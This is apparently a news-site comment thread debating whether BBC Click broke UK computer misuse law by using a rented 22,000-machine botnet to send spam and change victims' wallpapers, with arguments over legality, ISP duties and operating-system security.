Dear WinTard user...
So how many of the 22,000 hijacked machines were running OS X?
No further questions ;)
An investigation by the BBC into cybercrime may itself have broken UK computer crime law. BBC Click got its hands on a botnet of 22,000 compromised PCs from an underground forum. It used these machines to send spam to two accounts it had established with Gmail and Hotmail. The programme also used these zombie machines to show …
"Even if it was done with the best intentions and in the public interest, that is unauthorised modification of a computer and an offence under the Computer Misuse Act,"
What's even more offensive is not prosecuting the company that supplied the OS that was so easily compromised in the botnet attack. Now what was the name again, I notice how it was never mentioned in the original article.
"These are not attacking any kind of vulnerability in the computer .. They are attacking the vulnerability of people's brains"
http://www.guardian.co.uk/technology/2004/may/05/viruses.security
"We were just seeing how easy it is to do" ...
similar to that McKinnon blokes defence imo , he was just looking ......
Dodgy corporation thinking that the laws don't apply to them as per usual even though they actually helped the infected users by advising them how easy they were to infect .... the fact remains that they illegally took control of those machines .... and if the owners of said machines have unpatched/protected machines in the first place the chances are that they won't know/care about patching them now...
The only way to prevent machines being incorporated into botnets would be for a law to be passed where ISP detect if machines are fit to be used on the Internet , patched , secure etc .and block them if they aren't .... similar to an M.O.T that automobiles have to pass.
Paris 'cos she loves to be serviced !
The BBC contravene the computer misuse law in the name of education and seemingly walk away scott free.
Forgive me if I'm mistaken but I remember similar instances whereby 'joe bloggs' has attempted similar feats in the name of education for the common good which resulted in jail time.
... the law is an ass!
Such action is probably the only way to make some people aware that their PCs have been compromised. It's certainly the most efficient, and ISPs should be encouraged to take similar action, or at least notify their customers, when they detect suspicious activity on their networks.
Do we know where the compromised PCs are based in the world?
What if some of those botnet computers were in the US military? The Pentagon? NASA?
Will the USA try and extradite the BBC's Spencer Kelly just like Gary McKinnon?
I'm running a poll on my blog if anyone wants to give their opinion on whether the Beeb were justified or not in what they did.
http://www.sophos.com/blogs/gc/g/2009/03/12/bbc-break-law-botnet-send-spam/
Cheers
Graham Cluley, Sophos
Is it still flavour of the month to bash the BBC?? I cant think of a better company that could get the message out and highlight the problem which ultimately is a benefit to everyone.
As for lawyers, its like asking a gardener if your lawn needs cutting......the answer will always be yes, cheque is fine....
Maybe there should be an international taskforce that collects botnets, disables them and alerts the user.
" 'The BBC appears to have broken the Computer Misuse Act by causing 22,000 computers to send spam,' said Struan Robertson, editor of out-law.com and legal director at solicitors Pinsent Masons. 'It does not matter that the emails were sent to the BBC's own accounts and criminal intent is not necessary to establish an offence of unauthorised access to a computer.' "
If SPAM is defined as "Unsolicited email of a commercial nature" (and I am reasonably certain that it is [meat-like products not withstanding]) then you cannot, by definition, SPAM yourself. Because then it isn't unsolicited.
The unauthorized access to a computer bit is still valid though.
Great, so now a hacker can get into people's computers, put a screensaver on saying this is the BBC, you need to install some software to fix this, cue download more malware. This is exactly the kind of thing we are told not to trust, 'you bank will never ask for your password' etc, you would think the BBC wouldn't hack inot your computer!
They will get off scott free but they deserve a massive fine for this, what were they thinking????
Again and again in these forums, and I'm thinking of the ones that relate to botnets and spam and viruses, commenters are arguing over the rights and wrongs of using a 'good' virus or some other techniques to expose users vulnerability to hijacking and prompting them to fix it.
Now someone has actually gone and done that and you're all jumping up and down, shouting 'It's wrong! It's wrong!' Make you're chuffing minds up peeps. What is it you actually want?
A spam reduced world or the one that we've got where we all sit around bitchin about how botnets and spam are the incarnation of Satan but actually doing fuck all to fix anything more than our own spam filters?
Personally, I think the BBC have probably done us a service by, hopefully, reducing by a few thousand the number of machines capable of spewing out the shit that we all have to filter from our inboxes 24/7.
Yes, it was probably illegal. But FFS surely that has to be weighed against the positive end result.
IMHO I don't think they went far enough by half.
Im still bemused knowing that thousands of folk out there dont even notice that there computer runs like a 20 year old one legged dog,with slow to useless web speeds and busy hard drives thats sending out spam everyday?
Do these tards not know what a smooth un infected pc should be like?
"Oh i thougth that was normal" "Whats task manager?"
Aims Anti Webtard rifle
*Click*
Ill vote for a licence to use a computer any day,whenever if ever a petition arises.
*Bang*
Now forgive me if im wrong and feel free to persecute me if im being bloody stupid, but the headline :
"BBC team exposes cyber crime risk "
does lend itself to intimating that this is something the beeb has uncovered. Now I can accept the argument that the BBC news website is read by a large audience which is not particularly knowledgeable about botnets and so an article is newsworthy on the website, however, compounding a lack of research into cybercrime law with sending oneself up for 'exposing' something that has been well known to be in existence is very shoddy journalism.
Even the simplest of investigations would show how well known this is and also would show how easy it is to gain access to a 'botherd' without having to then very probably break the law in doing so. The arguement that it was in the public interest is particularly weak here as I cannot see how they can demonstrate that they needed to perform a mass email send.
My own opinions of BBC technology reporting aside, I think that If Daniel Cuthbert can be prosecuted for his "offence" then the Click team should be worried. At least he wasn't trying to grandstand! It would be nice if the BBC could articulate just how they decided this was a wise thing to do even if it was a good thing to make the masses more aware.
Bill - because most of this is his fault.
Well, if the BBC acted unlawfully it shows how useful this law is. If it doesn't stop the public broadcaster it's not exactly going to stop someone whose motives are less wholesome.
If your system has been compromised, the fact that it's against the law isn't going to help. It's like the hunt master reassuring the police that he will say "Stop" when the hounds have picked up a scent.
Well as far as I'm concerned if the BBC had altered the machines so that they were taken offline then I would have been applauding the action.
Often machines that have been participating in botnets have been doing so for far to long and need to be shutdown, updated and fixed and then regularly updated and maintained from that point onwards instead of becoming spam generation machines.
Can I use that an excuse next time I'm found in a strangers house in the middle of the night?
"Its not illegal, your front door was open because you basically gave your keys to a stranger down the pub. So I've just come in to walk around and see what your house looks like, oh I and I might have used your computer to send a few emails. but I've not done anything really illegal like actually steal anything"
There really are some fuckwits at the BBC. I don't actually think its Illegal to leave your computer unpatched so it can be hijacked, it IS illegal to access those computers without permission and use them in a covert way
"What's even more offensive is not prosecuting the company that supplied the OS that was so easily compromised in the botnet attack. Now what was the name again, I notice how it was never mentioned in the original article."
If you think non-windows OSs can't be compromised by stupid users running dodgy programs, you're asleep, and aren't paying attention to your secuirty mailing lists, and I hope to God you aren't responsible for computer security in your job.
"The BBC contravene the computer misuse law in the name of education and seemingly walk away scott free."
I'm not trying to say they _won't_ get away with it, but that news story was posted at 5am, 9 hours ago. It's hardly a huge miscarriage of justice that there hasn't been evidence collected and a decision to prosecute made at this stage, is it?
I found this story on The Register having already tried to make a complaint to the Met about the BBC. Because I am not a victim I am unable to, they will not take a complaint.
I will be making a complaint to the press complaints commision too.
My main beef with this is that the BBC are making this outrageous claim that because there was no criminal intent it is legal.
You've got potentially loads of script kiddies out there who may well want to do nothing more than spam their friends who may well now believe their acts are legal and may well end up prosecuted for doing something the BBC has told them is legal.
"You are using the letter of the law to defeat the spirit of the law"
What they did probably removed a huge amount of computers from that botnet. Yes the BBC had control of these machines, and could have done massive amounts of damage - but considering how easilly the BBC got access to this botnet surely you'd be happy to see it removed from the internet rarther then still out there waiting for letters to filter through ISP's crappy legal dept's and then slowly out to the users in all those different countries?
If they had gone onto peoples computers, hunted for illegal material and then posted that information to law enforcement agencies - yes that would've gone too far - but they didn't. They acted IN the public interest, FOR the public good.
Seriously, get over ourselves, stop lapping up the Wackie Jackie hype and realise that there are exceptions to the rules and discretion should be used in some situations.
Best intentions or not - you do not break into someones house and steal all their stuff to show it was possible and with "the best intentions".. Bandwidth was used here that will never be gotten back and perhaps peoples computers crashed when the ddos attack took place. Maybe someone had an important message set as their screensaver like "Must remember to take my pills at 2.30pm to avoid dieing a painful death" and whilst their bandwidth was being throttled they could have been stopped from doing anything, ranging from having a wank to an important business conference.
And..... For future cases, if they are not prosecuted OR if they are prosecuted and the charges dismissed by "Experts" then how does this fair for future cases.
"In the case of the BBC it was argued that a denial of service attack or changing of screensaver did no harm to the computer and does not qualify as illegally modifying a computers contents"
Silly buggers....
"The BBC appears to have broken the Computer Misuse Act by causing 22,000 computers to send spam," said Struan Robertson, editor of out-law.com and legal director at solicitors Pinsent Masons. "It does not matter that the emails were sent to the BBC's own accounts and criminal intent is not necessary to establish an offence of unauthorised access to a computer."
If the emails sent were by the BBC to their own accounts, on what grounds are they 'spam' - surely that refers only to unsolicited emails?
That said, those responsible at the BBC seem very naïve if they think that what they did was in any way legal, or indeed ethical.
Hopefully the shouty lawyer types will see this as a form of "ethical hacking" rather than a black & white Computer Misuse issue. Consider if the BBC had gone down the ISP info route:
1 - spend time tracking down names and contact details for each and every ISP involved
2 - ISPs then have to look-up who was using the IP at the time
3 - Letters get written (maybe) along the lines of "Dear Mr Smith. This is your friendly ISP warning you that you need to update your Windows XP security settings.... etc."
4 - I susect Mr Smith will get as far as "ISP" before adding the letter to the other 21,999 in the paper recycling bins around the UK.
5 - 22,000 compromisable PCs will remain compromisable.
6 - Just maybe a small percentage of people will take the letter to their PC and follow the instructions.
At least this way the BBC threw a bloody great bitmap in front of the users. with a URL containing instructions on how to fix the problem. How many are going to ignore that after a few days?
An ethical approach would have notified the users immediately, and reported the botnet operator to the police.
BBC did not notify users first, did not ask for consent to use the resources of their computers, and exploited those machines regardless.
CMA is a criminal offence.
In other news, BBC launches its own version of 'Who Wants to be a Millionaire'. Contestants are given a balaclava and handgun, and get 10 minutes to steal as much cash as possible from a high street bank (all money returned, banks advised about security measures etc etc)
Is there a wallet in this coat?
It's also probably an example where the only valid kind of test is an in-the-wild test. And an in-the-wild test will have to involve a degree of blindness (preferably double-blindness) or the test becomes biased. How would the BBC be able to perform a test like this unbiased and not break the law?
As the BBC pointed out (well they didn't metion Linux,), that you need to update your software.
See how many securtiy fixes have been released for Mac and Linux....oh look there are some, best ignore them and pretend it doesn't happen coz Dave down the park told me so, so it must be true.
I don't give a flying f**k which software is the best, I left the playground a long time ago.
You my friends are the stupid sort of f**kwits that this article is trying to enlighten.
NO OS IS 100% secure. Get over it and keep updated.
I only installed that key logging software to survey how many people were using strong passwords and educate them if they weren't.... honestly!
If there isn't at the very least a criminal investigation into what the BBC did then that in itself will be criminal. I am also exceedingly Pro-BBC under normal circumstances too for the record.
Its time the ISPs and AV companies took direct action against these botnets by at the very least keeping them off the Internet until they clean up their act. This is the way the Internet has to police itself, does anyone really expect national governments or police forces to be able to do anything about this? Of course not, don't be stupid. Those dullards who let themselves be compromised need some tough love, instead of this precious pontificating. The BBC is to be commended for at least daring to do something positive - unlike the bloody US lawyers who defend the spam bandits for example!
We need direct action now against the spammers, hackers and fraudsters that are blighting the internet.
>> BBC Click claimed that "If the exercise had been done with criminal intent it would be breaking the law".
The intentionally broke the law, but it is okay because they didn't intend to break the law, therefore no law was broken. Sounds a lot like mind over matter. Are they able to bend laws with the power of their minds. Simply be thinking strongly enough, they can make the illegal legal. It all makes my brain hurt. Although, I don't suppose they invented the idea; it's not that different from the filesharing freetard* mantra.
*BTW I hate that word
Ok I'm on the fence about one issue - alerting the user...Its in thier interest!
BUT using those machines to ddos a site (no matter which) and to send mail (no matter where)was clearly NOT in the INTEREST of the computer OWNER.
This is deffinatly a breach of the misuse act... There is no way of painting that...
On previous shows, i have wondered at what can only be called a "Script Kiddie" approach to technical information.
Ok it does have to be dumbed down for tele, but some of the stuff they have shown has been questionable...
e.g. Go to this forum to find info on building a phishing site.... and then this one to sell your dodgy credit card numbers.
Oh and standard anti BBC comment: trading on a reputation from years ago, should be cut back to a news organisation and the license fee scrapped. If i want to pay for BBC then i should have a choice just like the choice i have with Sky.
Clearly changing people's backdrops to warn them of the trojan is illegal but in the best interests of both the computer user and internet as a whole. If security firms just got on and did it rather than jobsworthing up the situation then they could be making serious headway in cutting down on spam and DDoSs.
I would suggest that perhaps the reason that they don't is not because of the legal technicalities at all, but because they profit from the spread or viri, trojans and the threat of DDoS attacks.
I think the Beeb did commit a crime and I think they were right to do so.
Yes, they misused these people's computers and yes they did "attack" services; two assets they had registered (i don't think Google or Yahoo! have any terms about sending SPAM *to* an address, merely *from*) and one they got permission to attack. They then committed a further crime by changing the compromised PC's wallpaper to a warning. All small potatoes if you ask me.
The crime they have prevented is these 22,000 odd PCs being used in a malicious assault against other bodies, and probably repeatedly so. This, to my mind, more than justifies the actions. And would have more than justified the actions of the security researchers/joe-bloggs-white-hat too.
What I want to know is what the ISPs were up to during all this. If it is so pathetically easy to get access to 22,000 PCs on a bot net, why are the ISPs not doing so an KICKING THESE UNITS OFF THE NET? Why are they not DOING THEIR FECKING JOB? If they (and the police, governments and MS) fail to do their job, then it is up to the community to take action and defend itself. So save the BBC from your ire and direct it where it should go; lazy ISPs, police more obsessed with revenue generation through speeding tickets than crime fighting and incompetent MPs.
This entire story smacks of ass-hat, lawyer, scum trying to make another fast buck.
Clearly many posters (and lawyers) would prefer that these 22,000 machines were still churning out spam and DoS attacks.
As it stands, ISPs should be prosecuted as accessories to the enormous numbers of hacks perpetrated by machines on their networks - hacks that they could easily prevent.
This is journalism, people - actual real journalism, not wikishite bogOsphere journalism where you only have to tell other people who already knew so that they'll link to you. Normal people out there in the "real world" have no idea what a bot net is and would welcome being warned that their machine has been dettached from one.
Pass the info to the ISP and let them contact the user... LMAO! Oh tell me another one, that's too funny!
You're lucky if your ISP manages to keep a broadband connection up and running, let alone chasing anyone on their network who has been pwn3d!
The other year one of my email servers was on the receiving end of 20 thousand virus email a day from one IP, it took me 3 days of constant phone calls to the ISP before they stopped, and I think that was only because I finally found the number of their technical director by randomly changing some digits at the end of their DDI range.
Once again the BBC Click show has shown that it is ass of the highest order. The quality and knowledge of the reporters on there is questionable at best so that most of the time I just switch over if I'm ever unfortunate enough to be around when it's on. It grieves me that license fee is wasted on a show like this.
Paris, because she knows how to Click all the right buttons.......
Are you people defending the BBC saying that I would be right to set up a company that hacks commercial networks and then offers to plug their security holes for compensation?
They used other peoples machines and bandwidth without permission and is clearly illegal.
Good grief....
Some of you people are clearly very, very stupid. You probably subscribe to Sky too, don't you? The two are not usually mutually exclusive.
First, the BBC did not compromise the machines - they were already compromised (by Microsoft or Apple or Linus Pauling or even the bot-herders ... whomever you prefer to blame).
Second, do you complain when the BBC breaks the law under questionable regimes (like Zimbabwe's) and reports from there when they've been banned? Or is that somehow justified because those people are foreign and therefore incapable of making their own decisions?
Third, I'm fairly certain that failure to report a crime is a crime in itself. Which means that each and every investigative journalism story about the gangland underground, about drugs, about prostitution, about illegal immigrants etc. etc. is, in itself, reported by criminals.
Fourth, how else are you meant to report a story about bot-nets? Go to Russia and find the bot-master?! The BBC may have some contacts but seriously...
In short, grow up. And keep your irrational tantrums about paying the licence fee out of an otherwise rational debate.
M'learned colleagues above, write:
... a defence of "preventing a crime"...
and
... precedent so that in future cases, could a defence of 'in the public interest' be used?...
FFS, people! Don't you know that Acts of Parliament have defences written into them, and "preventing a crime" isn't ever one of them? Don't you know that precedents are set by legal proceedings (trials, usually)? Who was asleep during General Studies, eh?
Commenting on stuff on the Interwebs is fun, but just having an opinion doesn't alter the law into something you think might be "fair".
Its a double edged sword, but hey, its OK to break the law, because we're the BBC the organisation who threaten us on a regular basis with 'its all in the database' an such...
Just a reminder to the ivory towered BBC its contrary to the computer misuse act & they've been daft enough to publicise it.
I wonder what ratio of viewers may look at that & be inspired by the words: "its really easy to do" as some one correctly pointed out, according to the BBC does it legalise an offence if its committed with relatively few traces?
According to their twitter page, they spent six months creating this program... This is not some casual faux pas.
http://twitter.com/bbcclick
"Six months in the making and finally the botnet show is ready. Presenter, Spencer Kelly in the Click edit suite. D http://twitpic.com/20yuw"
As far as I'm concerned, I see all "legal avenues" as exhausted as for taking these botnetted systems offline. Most ISPs in which these botnetted systems are connected to don't pay attention to their own networks and there are no laws put in place allowing the systems to be forcibly removed from the public internet by "good citizen action", and until these systems are actually taken offline forcibly, albeit through attacking said systems or otherwise, the owners of these systems will continue not to care.
You can warn users only so much, and most users won't care that their system is infected until you render their service (or computers) unusable and provide them no alternative but to clean their systems up.
In my opinion: Ignorance is not an excuse for having an infected machine, botnets have been an issue for well over a decade now, if you claim ignorance to having an infected machine, you shouldn't even own or run a computer.
Heard of botnets? Heard of e-voting? Pause for a synaptic connection to occur.
The Blaggers' Blagueurs Claque has the job of winning the next election for nu labour. Nu labour won't upset the applecart. After the next election, the applecart turns into a tumbril.
Just because it's become a fad thing to do does not make it legal, nor acceptable. And unless the BBC took apart the code, line by line, I personally don't accept that they have 'removed' the code. They make think they have, but it's not in the interest of the bot net sellers to reduce footprint, or thus, sales, or resources.
It is very much time that people started being seriously convicted in these cases, like the Sony root kit, it needs to be made very clear to legal entities that computer abuse, of others systems is an illegal act, and where done wilfully by such entities, prosecution to the full extent of the law needs to be done.
Any claims that this was done in good nature, or in public awareness or any other claptrap is irrelevent. And by publishing this information and the ease of access, it simply furether expands the underground and illegal acts and does not help deal with the problem.
I'm not fond of people taking tax payers money, and committing crime, and stupidity on this scale. Someone's head needs to roll. Now. Today. And someone needs to be taken to court. I wonder what BBC IT and management would think if this action were reversed, and their systems were hacked to 'prove a point'. I expect that would not be regarded as acceptable.
GREETINGS KIND COMPUTER USER, THIS IS THE BBC
YUOR COMPUTER MACHINE HAS BEEN INFECTED WITH VIRUSES. AS YOU MAY HAVE SEEN ON THE BBC TELEVISION WE ADVICE YOU TO IMMEDIATELY GO TO BBBC.ANTIVIRUS.COM TO PREVENT THE VIRUS FROM DESTROYING THE COMPUTER.
THIS IS SAFE AND LEGAL AND YOU MUST DO THIS IMMEDIATELY OR YOUR COMPUTER MACHINE IS IN DANGER.
THANK YOU
BBC COMPUTER SAFETY TEAM
Well it did take long to get the old inferiority complex knee jerk reaction from the Balmertard decipiles.
Wussa matter kiddies? Just can't admit your OS has more holes than the friggin titanic. bohoho!!!
Of course no OS is 100% secure, yours is just inherently less secure than the rest of the bunch put together.
Move on losers & get a life. End of story.
So this victimless crime, with no malicious intent, that hurt no one, didn't steal anything, and benefited the users by notifying them that they were botnet participants has everyone upset?
When the law is written to hurt people trying to do good, you should be upset at the law not the person breaking it. White hat hacking should never be illegal. In fact, no type of hacking without malicious intent or monetary gain should not be illegal.
This was awesome (loved the changing of the desktop piccy) and I think everyone should do this all the time. Any law that stands in the way of helping people should be re-written.
All you need is a web server (e.g. Apache), and php, and if you're careless (like many web admins are) you can become part of many botnets that target flaws in open source cross platform products, such as php or the apps that are installed on Apache and php based servers.
And don't for a minute think that the chances are low due to it being OS X or linux. Just looking at my server logs on my linux web server and on a daily basis there are hundreds of attempts to exploit vulnerabilities in hundreds of (mainly) php applications.
5 years or more ago I used to see attacks aimed at IIS. Now it's all php attacks and that means you mactards and lintards are the target (yeah, I know Mac users are less likely to run servers, but some do, and some might have a mini web server installed as part of some app that provides a web admin interface which is probably worse if it's not updated frequently enough).
Sure, the OS security may not allow the hacks to get into the core of the system, but the surface APIs exposed within php and Apache once hacked is often enough to add the system to the botnet to spam millions of others.
Enjoy.
The show will have to have been cleared with the BBC lawyers before broadcast (and if they were sensible, they will have got legal advice BEFORE production even started), so it will be fascinating to know what 'Click' was told.
The law appears to be clear, but I wonder if the Beeb's lawyers thought they could rely on a 'public interest' defence - and if they did, where they got that reading of the law.
Still I feel sorry for 'Click''s half-dozen regular viewers if Spencer and co. are sent to chokey.
they didnt only send a few k of emails out. but they also left it running for hours which they say in the video. doing the original emails to improved public awareness maybe ok
but doing it fr hours is ott?
remember some people are charged for the bandwith they use. so im guessing the beeb is oigng to pay for that!?!?!
after removing the file. which they probiblt just clicked the inbuilt "remove" button which i know for a lot of bots just allows the original user of the bot not to see it anymore but the bot coder to still have access.
Did they patch the system. So that nobody could get right back in again!?
the isp cannot kick every infected computer off the network because they cannot see without sniffing packets if it is infected.
even then they cant be sure of that
also
if the beeb wanted to show how powerful ddos or spamw as why didnth they infect there OWN machienes. im sure there is a couple hundreds boxes lying around in the bbc somewhere for them to hook up to their network
Perhaps something on the lines of "civil disobedience"? Claiming that, given inaction to a real and genuine problem, the only way to incite corrective action is to take a stand against it, consequences or no consequences. Think of it like the "village and the guerillas" moral dilemma.
This is what juries of our peers are for. To be ordinary (hopefully) intelligent people sitting as the last line of defence against the rampant and gratuitous fuckwittery [My (TM), I coined it!] of the government and legal (not "justice") systems.
You could have a kilo of herb in your living room, and the Street Wars camera crew all over it, but if a jury of your peers decides that you have not caused harm to anyone but yourself, then PC Plod is very sorry to have bothered you. Or else.
If the BBC can present a clear case that their actions had overall positive results in the public interest, then they have nothing to morally *feel guilty* about. The jury should, in theory, feel the same way, and subsequently exercise their right to deliver the ferdict they feel appropriate, as opposed to treating "Guilty/Not Guilty" as "In Contravention/Not In Contravention" of applicable ideological diktats.
No wonder Blair + Co. went to work on Jury trials, judicial independence, and double jeopardy!
Yes, that one, with the 40 large in used notes and Ryanair self-printed boarding pass to Portugal...
Changing the wallpaper is a standard virus tactic. Now the virus writers just need to add a BBC logo when then link you to their dodgy "anti-virus" websites. What the BBC did is stupid as it hands more ammo to the virus writers.
It makes more sense for an ISP to be blocking these infected machines, but that would mean port monitoring. So a minefield in all directions.
And anyone who calls a wallpaper a screensaver should be shot.
People that allow their PC's to be compromised shouldn't be using the internt, most people will never change, they'll buy something they don't understand, never work out how to use it and then blame someone else when it all goes wrong
Why is the BBC wasting time telling people who won't keep up with the times how to keep their computers secure? within 6 months there'll be a new trojan and the dumb fucks will be back in the same situation.
"... and criminal intent is not necessary to establish an offence of unauthorised access to a computer."
Funny they should say that. So why did the police and DPP refuse to prosecute the illegal BT/Phorm trials, which constituted a similar offence, because BT "had no criminal intent?"
Considering that what the BBC did was actually beneficial, in that 22,000 botnet victims were alerted to the malware and a nice big botnet was taken offline, while what BT/Phorm did was an egregious theft of people's private data that benefits nobody but the pigs at the trough, we see yet again that the law is only enforced in ways that make life worse for everyone, never better.
Remember Orwell? "How does one man assert power over another? By making him suffer."
Let's say the BBC get away with this without significant punishment. What next?
Suppose some other broadcasters, newspapers and possibly Universities decide to educate people in the same manner, and they all try to set up botnets. The PCs that are fought over by more than one botnet experience a software problem which bricks thousands of home PCs.
Who's going to visit and fix them, one by one?
ISPs do not have to break the computer misuse act, all they have to do is detect the bot net activity (or be granted control via some form of sting) and once the IP is known; block the rouge PC.
When the dumb user phones up to see why their interpubes are broken, they can be told in excruciating detail why, how they need to fix it and how much the ISP is going to bill them. Also that they are now black-listed and no ISP will touch them until their PC is independently verified as being clean (at the user's expense).
People who do not take their security on the internet seriously should not be on the internet. A bit like those who do not take ther personal safety seriously in many sports get kicked out pretty quick.
To the others bleating about Mac/Linux; for the *average* user (note: not running a server) both of these OSs are leagues more secure than Windows. The guys on the "Going Linux" podcast left a Linux box attached to the net (no firewall, nothing) with an open invite to hack it. It remained secure. Episode 21, Dec 20th 2007.
You are quite right about PHP et al (which goes back to the first point; if you don't take security seriously.....) but Mac/Linux are more by their nature secure. Windows, by its nature, is the loose, clap ridden tart whoring around the seedier taverns making out with as many people as it can and spreading its "special gifts" far and wide.
As Linux is free, this also means the poor and needy can still get net access (for job hunting etc) and not have to pay through the nose for the OS, AV, firewall, spyware detectors etc. that you need to have a hope of keeping Windows safe.
I am a Windows user, but I am getting increasingly pissed off with it.
The problem is that the newer computers are like that when they arrive.
I have an aged Win2k box; Task manager shows ~20-30 tasks (including DNS, Web, FTP, etc. servers).
My wife's new laptop shows ~70 tasks doing nothing. Runs like a dog, brand new before even being exposed to the 'net.
Oh and then there's the fact that the nasty tasks don't show up because Sony hid them...
When I read the BBC report I could hardly believe it. What complete idiots.
There are professional security people who study botnets. They are as keen as anyone to investigate them, but do they do this sort of thing? No. Because it's unethical and illegal. (Oh and because they're professionals not ignorant amateurs.)
If this goes unchallenged, how long before he government grants itself the right to hack into your computer "just to check if everything is all right"? How long before there's a virus claiming to be a friendly visitation from the BBC? The law forbids this sort of thing for a multitude of reasons. The contents of my computer belong to me. Just because one criminal manages to break in doesn't mean I want to invite a load of crooks from the BBC along to join them in a big botnet party. And I certainly don't need the BBC nannying me about how to set up my computer. If I want advice on that, I'll go to someone who knows what they're doing, not a bunch of journos on a mission.
Doubtless it will be difficult, as usual, to get a criminal investigation started against the BBC, but that shouldn't stop us trying. If I owned one of the compromised computers I'd also certainly be exercising the BBC's complaints machinery right now and that would include a demand for a substantial amount of monetary compensation.
I sent this letter to the BBC first thing this morning:
"I'm saddened by the BBC's apparent complete lack of comprehension of the issues at stake in this report. The clear implication in the latest Click report is that you think breaking into and entering people's personal computers is acceptable behaviour, as long as your actions are benign in nature. The claim that the Click programme was not breaking the law because there was no criminal intent simply doesn't stand up; unauthorised computer usage is not treated in the same manner as trespass under UK law. You do not need to be of criminal intent, you merely need to be executing programs on a computer to which you do not have authorised access. See the Computer Misuse Act 1990, section 1.1:
(1) A person is guilty of an offence if—
(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the function that that is the case.
This comes with a maximum sentence of six months and a fine of up to £5,000.
Should you require a real world example, there is a current case (of which I should not need to remind Click) in which a UK citizen is due for extradition to the U.S. to face a military tribunal for alleged hacking offences. His defence bears remarkable similarities to that claimed by Click - yet the UK government has no hesitation in sending him off because he broke the law and is not above it. As a hacker, it doesn't matter what colour of 'hat' you are wearing or what your motives are; if you access any computer without authorisation you're breaking the law and are liable for prosecution.
Furthermore, the activitites in which Click has engaged will do little to further the real cause of computer security, but will certainly put money into the pockets of the criminals (£5,000 by my reckoning) that the real professionals are trying to stop.
I would advise anyone that has received an email from the BBC informing them of the risk posed to their computer, to speak to a solicitor and consider filing charges. I would remind the BBC that no organisation or individual has the right to behave like this, for the purposes of exposure or otherwise."
Just beggars belief. I'd like to know exactly who was their legal counsel and why they're still in a job. So, so cavalier and naive.
Boing!
Here is the news from the BBC. Botnets are very bad for you. In other news today it was reported that Lord Mandelson of Custard Green has given assurances that he only intends to privatise 49% of the BBC which would give the Corporation access to high quality content from other providers. A spokeswoman for the Greedy But Needy channel said she welcomed the proposals of her friend Mandy and, quite frankly couldn't wait to get her hands on all that lovely licence fee income.
A judgement today in the European Court ruled that proposals by the UK government to implant RFID chips in the brains of new-born babies was abhorrent and totally illegal. Gordon Brown and the Daily Mail have condemned the ruling as an unwarranted interference in the affairs of an independent sovereign nation.
Our lead item in this evening's bulletin contained an unsupported assertion that Botnets might not provide you with a life enhancing experience. The BBC would like to issue an apology to anyone who has been offended by this item. Under new restrictions it is no longer permissible for the Corporation to provide evidence to support such clearly nonsensical claims.
And now, the weather from Worzel Gummidge.
This can and will now only lead to more malware suppliers using the BBC logo. I can also anticipate them using this with the following format :-
The BBC has 0wned your box. This is ok as we didn't do anything bad.
Please enter your user banks name and password here so that we can check it is strong enough for you.
Remember the BBC would never do anything to hurt you.
Stupid, stupid, stupid, stupid. They have managed to undermine security professionals everywhere.
Ever heard of "civil disobedience"? Anyway, how would YOU go about it? You can't use computers you know about because that introduces bias. So would constructing a botnet of your own. Awareness of even the potential of being invaded will influence behaviour and introduce even more bias. So how do you perform a real-world test of a botnet under unbiased real-world circumstances without performing an in-the-wild test?
I hope you don't mind but your letter echoed my thoughts so I have copied it and also sent it as a complaint with the addendum that I have copied it from another disgruntled person. I do not want my license fee paying for criminal activity. How many unscrupulous individuals will now use the BBC logo to hide what they are doing. This was stupidity of the highest degree. I can't even express how angry I am that license payers money has been given to a criminal gang for 'journalistic' reasons.
Dear Sir
Once again this covert communist front-organisation has been exposed dispersing public funding to criminals. For how much longer do we have to put up with this? Doesn't the BBC realise that there are starving bankers sleeping in cardboard boxes who are in much more need of support. British criminals deserve our money rather than a bunch of east European Johnnies.
Anyway, what's all this nonsense about botty-nets, eh? In my day they were called nappies or diapers, and none the worse for it. But that's the Beeb for you - full of shit as usual.
Outraged
Tunbridge Wells
"Could a defence of 'in the public interest' be used?..."
Well the BBC are skilled at breaking the law and using the above defence, following the actions of someone, whom a Scottish Police Force should have disarmed long before if they'd had the balls for it, on this day in '96 there was a whole raft of legislation banning 'handguns'. In the months following that ban the BBC contrived to illegally possess by illegal importation and by deception and theft 'handguns' and other firearms, their defence 'in the pubilc interest'.
Whilst C&E and the Police 'investigated' no-one went to jail or even ended up in court. The BBC still glorifies violence and by showing just how easy it was to illegally import firearms acted to promote that illegal trade.
Ah but Bliars, now Browns Brainwashing Colusionists are part of the states machinery, and prosecuting them wouldn't be in the states interest...
I have yet to find a door lock that a competent criminal or a locksmith can't pick. Using the same twisted logic of some of the fine people here, we should be suing lock manufacturers. The truth to the matter is, as long as man made it, man can break it.
Forget about the burglars, let's sue lock, door, window, and window glass makers. Their products are obviously not strong enough to deter a determined thief.
Rather than going into a Daily Mail moral outrage mode, did you watch it (it's on iPlayer now also I think) ?
Legality aside, it was a very interesting programme. In part for seeing just how advanced and professional the botnet software is. As Click's audience includes a lot of far less IT savy people, I'm hoping this will serve as a wake up call. It's amazing just how many people don't really understand how spam is sent and still believe spam mails are personally sent to them and they feel they have a need to read, reply and act on the spam.
It is also nice to see the botnet includes the ability to destroy itself. I'd be all for illegally using a botnet to kill the botnet.
"... Can we please bring the concept of 'Rules are for the guidance of wise men and the obedience of fools.' into law? Pretty please? "
Only if I'm one of the wise and you are one of the fools.
Now do you see the problem with this wonderful concept?
No, I didn't think you would. That rather proves my point.
I find it easy to applaud the BBC's actions, they was obviously no malicious intent. The spirit of the law , that is to decrease malicious abuse of computers , was palpably upheld.
I'm fed up with seeing the easy targets shot at, the real criminals are those that crafted the botnet and they should be the ones brought to justice, not the BBC..
Maybe the BBC putdowners already own botnets but paid far more than the BBC did?
Or perhaps they wish the Beeb never made it public just how many computers have been compromised, how easy it is to do, how sophisticated the tools are and how buoyant a botnet is with marketable qualities?